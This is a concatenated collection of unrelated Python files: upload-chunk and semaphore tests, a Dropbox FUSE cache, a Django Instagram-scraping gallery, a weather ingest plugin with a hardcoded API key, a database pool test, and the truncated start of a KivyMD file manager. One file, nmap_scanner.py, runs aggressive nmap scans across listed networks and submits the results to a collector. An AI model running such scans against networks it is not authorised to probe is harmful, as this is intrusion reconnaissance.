# Verify we can rewind to start
file_obj.seek(0)
self.assertEqual(file_obj.tell(), 0)
def test_file_chunk_supports_context_manager(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'abc')
with ReadFileChunk.from_filename(filename,
start_byte=0,
chunk_size=2) as chunk:
val = chunk.read()
self.assertEqual(val, b'ab')
def test_iter_is_always_empty(self):
# This tests the workaround for the httplib bug (see
# the source for more info).
filename = os.path.join(self.tempdir, 'foo')
open(filename, 'wb').close()
chunk = ReadFileChunk.from_filename(
filename, start_byte=0, chunk_size=10)
self.assertEqual(list(chunk), [])
def test_callback_is_invoked_on_read(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.read(1)
chunk.read(1)
chunk.read(1)
self.assertEqual(self.amounts_seen, [1, 1, 1])
def test_all_callbacks_invoked_on_read(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback, self.callback])
chunk.read(1)
chunk.read(1)
chunk.read(1)
# The list should be twice as long because there are two callbacks
# recording the amount read.
self.assertEqual(self.amounts_seen, [1, 1, 1, 1, 1, 1])
def test_callback_can_be_disabled(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.disable_callback()
# Now reading from the ReadFileChunk should not invoke
# the callback.
chunk.read()
self.assertEqual(self.amounts_seen, [])
def test_callback_will_also_be_triggered_by_seek(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.read(2)
chunk.seek(0)
chunk.read(2)
chunk.seek(1)
chunk.read(2)
self.assertEqual(self.amounts_seen, [2, -2, 2, -1, 2])
def test_callback_triggered_by_out_of_bound_seeks(self):
data = b'abcdefghij1234567890klmnopqr'
# Create test file
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(data)
chunk = ReadFileChunk.from_filename(
filename, start_byte=10, chunk_size=10,
callbacks=[self.callback])
# Seek calls that generate "0" progress are skipped by
# invoke_progress_callbacks and won't appear in the list.
expected_callback_prog = [10, -5, 5, -1, 1, -1, 1, -5, 5, -10]
self._assert_out_of_bound_start_seek(chunk, expected_callback_prog)
self._assert_out_of_bound_relative_seek(chunk, expected_callback_prog)
self._assert_out_of_bound_end_seek(chunk, expected_callback_prog)
def _assert_out_of_bound_start_seek(self, chunk, expected):
# clear amounts_seen
self.amounts_seen = []
self.assertEqual(self.amounts_seen, [])
# (position, change)
chunk.seek(20) # (20, 10)
chunk.seek(5) # (5, -5)
chunk.seek(20) # (20, 5)
chunk.seek(9) # (9, -1)
chunk.seek(20) # (20, 1)
chunk.seek(11) # (11, 0)
chunk.seek(20) # (20, 0)
chunk.seek(9) # (9, -1)
chunk.seek(20) # (20, 1)
chunk.seek(5) # (5, -5)
chunk.seek(20) # (20, 5)
chunk.seek(0) # (0, -10)
chunk.seek(0) # (0, 0)
self.assertEqual(self.amounts_seen, expected)
def _assert_out_of_bound_relative_seek(self, chunk, expected):
# clear amounts_seen
self.amounts_seen = []
self.assertEqual(self.amounts_seen, [])
# (position, change)
chunk.seek(20, 1) # (20, 10)
chunk.seek(-15, 1) # (5, -5)
chunk.seek(15, 1) # (20, 5)
chunk.seek(-11, 1) # (9, -1)
chunk.seek(11, 1) # (20, 1)
chunk.seek(-9, 1) # (11, 0)
chunk.seek(9, 1) # (20, 0)
chunk.seek(-11, 1) # (9, -1)
chunk.seek(11, 1) # (20, 1)
chunk.seek(-15, 1) # (5, -5)
chunk.seek(15, 1) # (20, 5)
chunk.seek(-20, 1) # (0, -10)
chunk.seek(-1000, 1) # (0, 0)
self.assertEqual(self.amounts_seen, expected)
def _assert_out_of_bound_end_seek(self, chunk, expected):
# clear amounts_seen
self.amounts_seen = []
self.assertEqual(self.amounts_seen, [])
# (position, change)
chunk.seek(10, 2) # (20, 10)
chunk.seek(-5, 2) # (5, -5)
chunk.seek(10, 2) # (20, 5)
chunk.seek(-1, 2) # (9, -1)
chunk.seek(10, 2) # (20, 1)
chunk.seek(1, 2) # (11, 0)
chunk.seek(10, 2) # (20, 0)
chunk.seek(-1, 2) # (9, -1)
chunk.seek(10, 2) # (20, 1)
chunk.seek(-5, 2) # (5, -5)
chunk.seek(10, 2) # (20, 5)
chunk.seek(-10, 2) # (0, -10)
chunk.seek(-1000, 2) # (0, 0)
self.assertEqual(self.amounts_seen, expected)
def test_close_callbacks(self):
with open(self.filename) as f:
chunk = ReadFileChunk(f, chunk_size=1, full_file_size=3,
close_callbacks=[self.close_callback])
chunk.close()
self.assertEqual(self.num_close_callback_calls, 1)
def test_close_callbacks_when_not_enabled(self):
with open(self.filename) as f:
chunk = ReadFileChunk(f, chunk_size=1, full_file_size=3,
enable_callbacks=False,
close_callbacks=[self.close_callback])
chunk.close()
self.assertEqual(self.num_close_callback_calls, 0)
def test_close_callbacks_when_context_handler_is_used(self):
with open(self.filename) as f:
with ReadFileChunk(f, chunk_size=1, full_file_size=3,
close_callbacks=[self.close_callback]) as chunk:
chunk.read(1)
self.assertEqual(self.num_close_callback_calls, 1)
def test_signal_transferring(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.signal_not_transferring()
chunk.read(1)
self.assertEqual(self.amounts_seen, [])
chunk.signal_transferring()
chunk.read(1)
self.assertEqual(self.amounts_seen, [1])
def test_signal_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock()
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
chunk.signal_transferring()
self.assertTrue(underlying_stream.signal_transferring.called)
def test_no_call_signal_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock(io.RawIOBase)
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
try:
chunk.signal_transferring()
except AttributeError:
self.fail(
'The stream should not have tried to call signal_transferring '
'to the underlying stream.'
)
def test_signal_not_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock()
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
chunk.signal_not_transferring()
self.assertTrue(underlying_stream.signal_not_transferring.called)
def test_no_call_signal_not_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock(io.RawIOBase)
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
try:
chunk.signal_not_transferring()
except AttributeError:
self.fail(
'The stream should not have tried to call '
'signal_not_transferring to the underlying stream.'
)
class TestStreamReaderProgress(BaseUtilsTest):
def test_proxies_to_wrapped_stream(self):
original_stream = six.StringIO('foobarbaz')
wrapped = StreamReaderProgress(original_stream)
self.assertEqual(wrapped.read(), 'foobarbaz')
def test_callback_invoked(self):
original_stream = six.StringIO('foobarbaz')
wrapped = StreamReaderProgress(
original_stream, [self.callback, self.callback])
self.assertEqual(wrapped.read(), 'foobarbaz')
self.assertEqual(self.amounts_seen, [9, 9])
class TestTaskSemaphore(unittest.TestCase):
def setUp(self):
self.semaphore = TaskSemaphore(1)
def test_should_block_at_max_capacity(self):
self.semaphore.acquire('a', blocking=False)
with self.assertRaises(NoResourcesAvailable):
self.semaphore.acquire('a', blocking=False)
def test_release_capacity(self):
acquire_token = self.semaphore.acquire('a', blocking=False)
self.semaphore.release('a', acquire_token)
try:
self.semaphore.acquire('a', blocking=False)
except NoResourcesAvailable:
self.fail(
'The release of the semaphore should have allowed for '
'the second acquire to not be blocked'
)
class TestSlidingWindowSemaphore(unittest.TestCase):
# These tests use block=False to tests will fail
# instead of hang the test runner in the case of x
# incorrect behavior.
def test_acquire_release_basic_case(self):
sem = SlidingWindowSemaphore(1)
# Count is 1
num = sem.acquire('a', blocking=False)
self.assertEqual(num, 0)
sem.release('a', 0)
# Count now back to 1.
def test_can_acquire_release_multiple_times(self):
sem = SlidingWindowSemaphore(1)
num = sem.acquire('a', blocking=False)
self.assertEqual(num, 0)
sem.release('a', num)
num = sem.acquire('a', blocking=False)
self.assertEqual(num, 1)
sem.release('a', num)
def test_can_acquire_a_range(self):
sem = SlidingWindowSemaphore(3)
self.assertEqual(sem.acquire('a', blocking=False), 0)
self.assertEqual(sem.acquire('a', blocking=False), 1)
self.assertEqual(sem.acquire('a', blocking=False), 2)
sem.release('a', 0)
sem.release('a', 1)
sem.release('a', 2)
# Now we're reset so we should be able to acquire the same
# sequence again.
self.assertEqual(sem.acquire('a', blocking=False), 3)
self.assertEqual(sem.acquire('a', blocking=False), 4)
self.assertEqual(sem.acquire('a', blocking=False), 5)
self.assertEqual(sem.current_count(), 0)
def test_counter_release_only_on_min_element(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
# The count only increases when we free the min
# element. This means if we're currently failing to
# acquire now:
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
# Then freeing a non-min element:
sem.release('a', 1)
# doesn't change anything. We still fail to acquire.
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
self.assertEqual(sem.current_count(), 0)
def test_raises_error_when_count_is_zero(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
# Count is now 0 so trying to acquire should fail.
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
def test_release_counters_can_increment_counter_repeatedly(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
# These two releases don't increment the counter
# because we're waiting on 0.
sem.release('a', 1)
sem.release('a', 2)
self.assertEqual(sem.current_count(), 0)
# But as soon as we release 0, we free up 0, 1, and 2.
sem.release('a', 0)
self.assertEqual(sem.current_count(), 3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
def test_error_to_release_unknown_tag(self):
sem = SlidingWindowSemaphore(3)
with self.assertRaises(ValueError):
sem.release('a', 0)
def test_can_track_multiple_tags(self):
sem = SlidingWindowSemaphore(3)
self.assertEqual(sem.acquire('a', blocking=False), 0)
self.assertEqual(sem.acquire('b', blocking=False), 0)
self.assertEqual(sem.acquire('a', blocking=False), 1)
# We're at our max of 3 even though 2 are for A and 1 is for B.
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
with self.assertRaises(NoResourcesAvailable):
sem.acquire('b', blocking=False)
def test_can_handle_multiple_tags_released(self):
sem = SlidingWindowSemaphore(4)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('b', blocking=False)
sem.acquire('b', blocking=False)
sem.release('b', 1)
sem.release('a', 1)
self.assertEqual(sem.current_count(), 0)
sem.release('b', 0)
self.assertEqual(sem.acquire('a', blocking=False), 2)
sem.release('a', 0)
self.assertEqual(sem.acquire('b', blocking=False), 2)
def test_is_error_to_release_unknown_sequence_number(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
with self.assertRaises(ValueError):
sem.release('a', 1)
def test_is_error_to_double_release(self):
# This is different than other error tests because
# we're verifying we can reset the state after an
# acquire/release cycle.
sem = SlidingWindowSemaphore(2)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.release('a', 0)
sem.release('a', 1)
self.assertEqual(sem.current_count(), 2)
with self.assertRaises(ValueError):
sem.release('a', 0)
def test_can_check_in_partial_range(self):
sem = SlidingWindowSemaphore(4)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.release('a', 1)
sem.release('a', 3)
sem.release('a', 0)
self.assertEqual(sem.current_count(), 2)
class TestThreadingPropertiesForSlidingWindowSemaphore(unittest.TestCase):
# These tests focus on mutithreaded properties of the range
# semaphore. Basic functionality is tested in TestSlidingWindowSemaphore.
def setUp(self):
self.threads = []
def tearDown(self):
self.join_threads()
def join_threads(self):
for thread in self.threads:
thread.join()
self.threads = []
def start_threads(self):
for thread in self.threads:
thread.start()
def test_acquire_blocks_until_release_is_called(self):
sem = SlidingWindowSemaphore(2)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
def acquire():
# This next call to acquire will block.
self.assertEqual(sem.acquire('a', blocking=True), 2)
t = threading.Thread(target=acquire)
self.threads.append(t)
# Starting the thread will block the sem.acquire()
# in the acquire function above.
t.start()
# This still will keep the thread blocked.
sem.release('a', 1)
# Releasing the min element will unblock the thread.
sem.release('a', 0)
t.join()
sem.release('a', 2)
def test_stress_invariants_random_order(self):
sem = SlidingWindowSemaphore(100)
for _ in range(10):
recorded = []
for _ in range(100):
recorded.append(sem.acquire('a', blocking=False))
# Release them in randomized order. As long as we
# eventually free all 100, we should have all the
# resources released.
random.shuffle(recorded)
for i in recorded:
sem.release('a', i)
# Everything's freed so should be back at count == 100
self.assertEqual(sem.current_count(), 100)
def test_blocking_stress(self):
sem = SlidingWindowSemaphore(5)
num_threads = 10
num_iterations = 50
def acquire():
for _ in range(num_iterations):
num = sem.acquire('a', blocking=True)
time.sleep(0.001)
sem.release('a', num)
for i in range(num_threads):
t = threading.Thread(target=acquire)
self.threads.append(t)
self.start_threads()
self.join_threads()
# Should have all the available resources freed.
self.assertEqual(sem.current_count(), 5)
# Should have acquired num_threads * num_iterations
self.assertEqual(sem.acquire('a', blocking=False),
num_threads * num_iterations)
class TestAdjustChunksize(unittest.TestCase):
def setUp(self):
self.adjuster = ChunksizeAdjuster()
def test_valid_chunksize(self):
chunksize = 7 * (1024 ** 2)
file_size = 8 * (1024 ** 2)
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, chunksize)
def test_chunksize_below_minimum(self):
chunksize = MIN_UPLOAD_CHUNKSIZE - 1
file_size = 3 * MIN_UPLOAD_CHUNKSIZE
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, MIN_UPLOAD_CHUNKSIZE)
def test_chunksize_above_maximum(self):
chunksize = MAX_SINGLE_UPLOAD_SIZE + 1
file_size = MAX_SINGLE_UPLOAD_SIZE * 2
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, MAX_SINGLE_UPLOAD_SIZE)
def test_chunksize_too_small(self):
chunksize = 7 * (1024 ** 2)
file_size = 5 * (1024 ** 4)
# If we try to upload a 5TB file, we'll need to use 896MB part
# sizes.
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, 896 * (1024 ** 2))
num_parts = file_size / new_size
self.assertLessEqual(num_parts, MAX_PARTS)
def test_unknown_file_size_with_valid_chunksize(self):
chunksize = 7 * (1024 ** 2)
new_size = self.adjuster.adjust_chunksize(chunksize)
self.assertEqual(new_size, chunksize)
def test_unknown_file_size_below_minimum(self):
chunksize = MIN_UPLOAD_CHUNKSIZE - 1
new_size = self.adjuster.adjust_chunksize(chunksize)
self.assertEqual(new_size, MIN_UPLOAD_CHUNKSIZE)
def test_unknown_file_size_above_maximum(self):
chunksize = MAX_SINGLE_UPLOAD_SIZE + 1
new_size = self.adjuster.adjust_chunksize(chunksize)
self.assertEqual(new_size, MAX_SINGLE_UPLOAD_SIZE)
|
cache.py
|
import contextlib
import logging
import errno
from typing import List
from enum import Enum
from pathlib import Path
from threading import Thread, Event
from fuse import FuseOSError
from requests.exceptions import ReadTimeout
from dropbox import Dropbox
from dropbox_fs.crawler import File
log = logging.getLogger(__name__)
class SizeWatcher(Event):
def __init__(self, size):
super().__init__()
self.size = size
class FileDownloader:
class State(Enum):
working = 0
success = 1
failure = 2
def __init__(self, path: str, file: Path, dbx: Dropbox, db_path: str, finished_callback):
self.path, self.file, self.dbx, self.db_path = path, file, dbx, db_path
self.state = self.State.working
self.finished_callback = finished_callback
self.size_watcher: List[SizeWatcher] = []
file.parent.mkdir(parents=True, exist_ok=True)
self.f = open(str(file), 'wb')
self.bytes_downloaded = 0
Thread(target=self.download).start()
def download(self):
log.debug('downloading {}'.format(self.db_path))
with contextlib.closing(self):
with contextlib.closing(self.f):
try:
md, res = self.dbx.files_download(self.db_path)
with contextlib.closing(res):
for c in res.iter_content(2 ** 16):
self.f.write(c)
self.bytes_downloaded += len(c)
[w.set() for w in self.size_watcher if self.bytes_downloaded > w.size]
except (ConnectionError, ReadTimeout):
log.error('downloading failed for {}'.format(self.db_path))
self.state = self.State.failure
[w.set() for w in self.size_watcher]
return
self.state = self.State.success
log.debug('download finished: {}'.format(self.db_path))
[w.set() for w in self.size_watcher]
def close(self):
self.finished_callback(self)
def wait_for_size(self, size) -> bool:
log.debug('waiting for size {}: {}'.format(size, self.db_path))
if self.state == self.State.working and self.bytes_downloaded < size:
log.debug('new size watcher for {}'.format(self.db_path))
watcher = SizeWatcher(size)
self.size_watcher.append(watcher)
while self.bytes_downloaded < size and self.state == self.State.working:
watcher.wait(2)
self.size_watcher.remove(watcher)
if self.state == self.State.failure:
return False
if not self.f.closed:
log.debug('flush {}'.format(self.db_path))
self.f.flush()
return True
class FileCache:
def __init__(self, base_path: Path, dbx: Dropbox):
self.base_path = base_path
self.dbx = dbx
self.downloading = {}
self.files_opened = {}
def open(self, path: str, rel_path: str, db_file: File, db_path: str, flags: int) -> int:
file = self.base_path / rel_path
if file.exists():
if db_path in self.downloading:
return self.open_file(file, flags)
return self.open_file(file, flags)
# downloading ..?
# newer ..?
else:
self.downloading[path] = FileDownloader(path, file, self.dbx, db_path, self.finished_downloading)
return self.open_file(file, flags)
def read(self, path, size, offset, fh):
try:
f = self.files_opened[fh]
except KeyError:
log.error('no open file found while reading from {}'.format(path))
raise FuseOSError(errno.EIO)
if path in self.downloading:
if not self.downloading[path].wait_for_size(offset+size):
raise FuseOSError(errno.EIO)
# else:
# log.debug('{} not in {}'.format(path, list(self.downloading.keys())))
f.seek(offset)
return f.read(size)
def close(self, fh):
try:
self.files_opened.pop(fh).close()
except KeyError:
log.error('no open file found while closing file handle {}'.format(fh))
def finished_downloading(self, downloader: FileDownloader):
log.debug('removing {} from downloading'.format(downloader.db_path))
del self.downloading[downloader.path]
def open_file(self, file, _flags) -> int:
f = open(file, 'rb')
self.files_opened[f.fileno()] = f
return f.fileno()
|
views.py
|
from django.shortcuts import render
from django.db import transaction
from django.http import JsonResponse
from django.core.serializers.json import DjangoJSONEncoder
from django.db.models.fields.files import ImageFieldFile
from .models import Gallery
import requests
import threading
import random
import json
class ExtendedEncoder(DjangoJSONEncoder):
def default(self, o):
if isinstance(o, ImageFieldFile):
return str(o)
else:
return super().default(o)
def GalleryJSON(req):
entries = (list(Gallery.objects.exclude(entry_id="0").order_by('-likes')))
gallery = []
for index, val in enumerate(entries):
gallery.append({
"standing": index,
"profile": val.profile_pic.url,
"thumbnail": val.thumbnail.url,
"insta_id": val.insta_id,
"post": val.post,
"entry_id": val.entry_id,
"caption": val.caption,
"likes": val.likes,
"submission": val.submission
})
random.shuffle(gallery)
return JsonResponse({'gallery': gallery}, encoder=ExtendedEncoder)
# Create your views here.
def EntryPageView(req):
return render(req, 'gallery/entry.html')
def updateTheDB():
cursor = ""
entries = {}
while True:
n = 0
data = requests.get(
'https://www.instagram.com/graphql/query/?query_id=17888483320059182&id=39236369448&first=50&after='
+ cursor)
data = data.json()
for detail in data['data']['user']['edge_owner_to_timeline_media'][
'edges']:
detail = detail['node']
try:
caption = detail['edge_media_to_caption']['edges'][0]['node'][
'text'][:10]
except:
caption = ""
likes = detail['edge_media_preview_like']['count']
entries[caption] = likes
pointer = data['data']['user']['edge_owner_to_timeline_media'][
'page_info']
if (pointer['has_next_page']):
cursor = pointer['end_cursor']
else:
break
with transaction.atomic():
for entry, likes in entries.items():
Gallery.objects.filter(entry_id=entry).update(likes=likes)
def LeaderBoardView(req):
# updateTheDB()
gallery = Gallery.objects.all().order_by('-likes')[:20]
# t1 = threading.Thread(target=updateTheDB)
# t1.start()
context = {'leaderboard': gallery}
return render(req, 'gallery/leaderboard.html', context)
|
nmap_scanner.py
|
#!/usr/bin/python3
'''
Submits nmap scans to nweb from local targets.txt.
'''
import sys
import requests
import subprocess
import time
import os
import random
import string
import json
import base64
import threading
import multiprocessing
import multiprocessing.pool
from netaddr import *
scope = []
try:
import ipaddress
except:
print("you should be using python3!")
sys.exit()
def scan(target):
server="http://127.0.0.1:5000"
print("target is "+target)
# scan server
rand = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
print("random value is "+rand)
process = subprocess.Popen(["nmap","-oA","data/nweb."+rand,"-A","-open",target],stdout=subprocess.PIPE)
try:
out, err = process.communicate(timeout=360) # 6 minutes
except:
try:
print("killing slacker process")
process.kill()
except:
print("okay, seems like it was already dead")
print("scan complete, nice")
result={}
for ext in 'nmap','gnmap','xml':
result[ext+"_data"]=open("data/nweb."+rand+"."+ext).read()
os.remove("data/nweb."+rand+"."+ext)
print("sending and deleting nweb."+rand+"."+ext)
if len(result['nmap_data']) < 250:
print("this data looks crappy")
return
else:
print("size was "+str(len(result['nmap_data'])))
# submit result
response=requests.post(server+"/submit",json=json.dumps(result)).text
print("response is:\n"+response)
if len(sys.argv) != 2:
print("./nmap-scanner.py <targets.txt>")
sys.exit(1)
for target in open(sys.argv[1], "r"):
scope.append(IPNetwork(target))
max_threads=3
for network in scope:
for ip in network:
if threading.active_count() < max_threads:
notifylock=False
print("number of threads : "+str(threading.active_count()))
t = threading.Thread(target=scan(str(ip)))
t.start()
else:
if notifylock is False:
print("too many threads .. waiting")
notifylock=True
time.sleep(1)
|
openweathermap.py
|
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
""" Weather report from OpenWeatherMap async plugin """
import copy
import asyncio
import http.client
import json
import logging
from threading import Thread
from aiohttp import web
from foglamp.common import logger
from foglamp.plugins.common import utils
import async_ingest
__author__ = "Mark Riddoch, Ashwin Gopalakrishnan, Amarendra K Sinha"
__copyright__ = "Copyright (c) 2018 Dianomic Systems"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
_DEFAULT_CONFIG = {
'plugin': {
'description': 'Weather Report from OpenWeatherMap',
'type': 'string',
'default': 'openweathermap',
'readonly': 'true'
},
'url': {
'description': 'API URL to fetch information',
'type': 'string',
'default': 'api.openweathermap.org',
'order': '1',
'displayName': 'API URL'
},
'appid': {
'description': 'Application ID registered with OpenWeatherMap',
'type': 'string',
'default': 'bbafe18fb275ae5b200d094e36c574ff',
'order': '2',
'displayName': 'Application ID'
},
'city': {
'description': 'City to obtain weather report for',
'type': 'string',
'default': 'London',
'order': '3',
'displayName': 'City'
},
'assetName': {
'description': 'Asset Name',
'type': 'string',
'default': 'OpenWeatherMap',
'order': '4',
'displayName': 'Asset Name'
},
'rate': {
'description': 'Rate at which to fetch weather report in seconds',
'type': 'integer',
'default': '10',
'minimum': '5',
'order': '5',
'displayName': 'Request Interval'
}
}
_LOGGER = logger.setup(__name__, level=logging.INFO)
c_callback = None
c_ingest_ref = None
loop = None
t = None
task = None
def plugin_info():
""" Returns information about the plugin.
Args:
Returns:
dict: plugin information
Raises:
"""
return {
'name': 'OpenWeatherMap plugin',
'version': '1.7.0',
'mode': 'async',
'type': 'south',
'interface': '1.0',
'config': _DEFAULT_CONFIG
}
def plugin_init(config):
""" Initialise the plugin with WeatherReport class' object that will periodically fetch weather data
Args:
config: JSON configuration document for the South plugin configuration category
Returns:
data: JSON object to be used in future calls to the plugin
Raises:
"""
data = copy.deepcopy(config)
return data
def plugin_start(handle):
global loop, t, task
loop = asyncio.new_event_loop()
try:
url = handle['url']['value']
city = handle['city']['value']
appid = handle['appid']['value']
rate = handle['rate']['value']
asset_name = handle['assetName']['value']
task = WeatherReport(url, city, appid, rate, asset_name)
task.start()
def run():
global loop
loop.run_forever()
t = Thread(target=run)
t.start()
except Exception as e:
_LOGGER.exception("OpenWeatherMap plugin failed to start. Details %s", str(e))
raise
def plugin_reconfigure(handle, new_config):
""" Reconfigures the plugin
it should be called when the configuration of the plugin is changed during the operation of the south service.
The new configuration category should be passed.
Args:
handle: handle returned by the plugin initialisation call
new_config: JSON object representing the new configuration category for the category
Returns:
new_handle: new handle to be used in the future calls
Raises:
"""
_LOGGER.info("Old config for OpenWeatherMap plugin {} \n new config {}".format(handle, new_config))
plugin_shutdown(handle)
new_handle = plugin_init(new_config)
plugin_start(new_handle)
return new_handle
def plugin_shutdown(handle):
try:
_LOGGER.info('South OpenWeatherMap plugin shutting down.')
task.stop()
loop.stop()
except Exception as e:
_LOGGER.exception(str(e))
raise
def plugin_register_ingest(handle, callback, ingest_ref):
"""Required plugin interface component to communicate to South C server
Args:
handle: handle returned by the plugin initialisation call
callback: C opaque object required to passed back to C->ingest method
ingest_ref: C opaque object required to passed back to C->ingest method
"""
global c_callback, c_ingest_ref
c_callback = callback
c_ingest_ref = ingest_ref
class WeatherReport(object):
""" Handle integration with OpenWeatherMap API """
__slots__ = ['_interval', 'url', 'city', 'appid', 'asset_name', '_handler']
def __init__(self, url, city, appid, rate, asset_name):
self._interval = float(rate)
self.url = url
self.city = city
self.appid = appid
self.asset_name = asset_name
self._handler = None
def _run(self):
self.fetch()
self._handler = loop.call_later(self._interval, self._run)
def start(self):
self._handler = loop.call_later(self._interval, self._run)
def stop(self):
self._handler.cancel()
def fetch(self):
try:
conn = http.client.HTTPConnection(self.url)
conn.request('GET', '/data/2.5/weather?q={}&APPID={}'.format(self.city, self.appid))
r = conn.getresponse()
res = r.read().decode()
conn.close()
if r.status != 200:
raise ValueError(res)
jdoc = json.loads(res)
reads = {
'city': jdoc['name'],
'wind_speed': jdoc['wind']['speed'],
'clouds': jdoc['clouds']['all'],
'temperature': jdoc['main']['temp'],
'pressure': jdoc['main']['pressure'],
'humidity': jdoc['main']['humidity'],
'visibility': jdoc['visibility']
}
data = {
'asset': self.asset_name,
'timestamp': utils.local_timestamp(),
'readings': reads
}
async_ingest.ingest_callback(c_callback, c_ingest_ref, data)
except ValueError as ex:
err = "Unable to fetch information from api.openweathermap: {}".format(str(ex))
_LOGGER.error(err)
|
test_pool.py
|
"""Test pool."""
import threading
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from homeassistant.components.recorder.const import DB_WORKER_PREFIX
from homeassistant.components.recorder.pool import RecorderPool
def test_recorder_pool(caplog):
"""Test RecorderPool gives the same connection in the creating thread."""
engine = create_engine("sqlite://", poolclass=RecorderPool)
get_session = sessionmaker(bind=engine)
shutdown = False
connections = []
def _get_connection_twice():
session = get_session()
connections.append(session.connection().connection.connection)
session.close()
if shutdown:
engine.pool.shutdown()
session = get_session()
connections.append(session.connection().connection.connection)
session.close()
_get_connection_twice()
assert "accesses the database without the database executor" in caplog.text
assert connections[0] != connections[1]
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice)
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" in caplog.text
assert connections[2] != connections[3]
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice, name=DB_WORKER_PREFIX)
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" not in caplog.text
assert connections[4] == connections[5]
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice, name="Recorder")
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" not in caplog.text
assert connections[6] == connections[7]
shutdown = True
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice, name=DB_WORKER_PREFIX)
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" not in caplog.text
assert connections[8] != connections[9]
|
filemanager.py
|
"""
File Manager
============
Copyright (c) 2019 Ivanov Yuri
For suggestions and questions:
<[email protected]>
This file is distributed under the terms of the same license,
as the Kivy framework.
A simple manager for selecting directories and files.
Example
-------
from kivy.app import App
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.modalview import ModalView
from kivymd.filemanager import MDFileManager
from kivymd.theming import ThemeManager
from kivymd.toast import toast
Builder.load_string('''
#:import MDToolbar kivymd.toolbar.MDToolbar
#:import MDRoundFlatIconButton kivymd.button.MDRoundFlatIconButton
<ExampleFileManager@BoxLayout>
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: app.title
left_action_items: [['menu', lambda x: None]]
elevation: 10
md_bg_color: app.theme_cls.primary_color
FloatLayout:
MDRoundFlatIconButton:
text: "Open manager"
icon: "folder"
pos_hint: {'center_x': .5, 'center_y': .6}
on_release: app.file_manager_open()
''')
class Example(App):
theme_cls = ThemeManager()
theme_cls.primary_palette = 'Teal'
title = "File Manage"
def __init__(self, **kwargs):
super().__init__(**kwargs)
Window.bind(on_keyboard=self.events)
self.manager_open = False
self.manager = None
def build(self):
return Factory.ExampleFileManager()
def file_manager_open(self):
if not self.manager:
self.manager = ModalView(size_hint=(1, 1), auto_dismiss=False)
self.file_manager = MDFileManager(
exit_manager=self.exit_manager, select_path=self.select_path)
self.manager.add_widget(self.file_manager)
self.file_manager.show('/') # output manager to the screen
self.manager_open = True
self.manager.open()
def select_path(self, path):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
self.exit_manager()
toast(path)
def exit_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.manager.dismiss()
self.manager_open = False
def events(self, instance, keyboard, keycode, text, modifiers):
'''Called when buttons are pressed on the mobile device..'''
if keyboard in (1001, 27):
if self.manager_open:
self.file_manager.back()
return True
Example().run()
"""
import os
import threading
from PIL import Image
from kivy.app import App
from kivy.metrics import dp
from kivy import PY2
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.boxlayout import BoxLayout
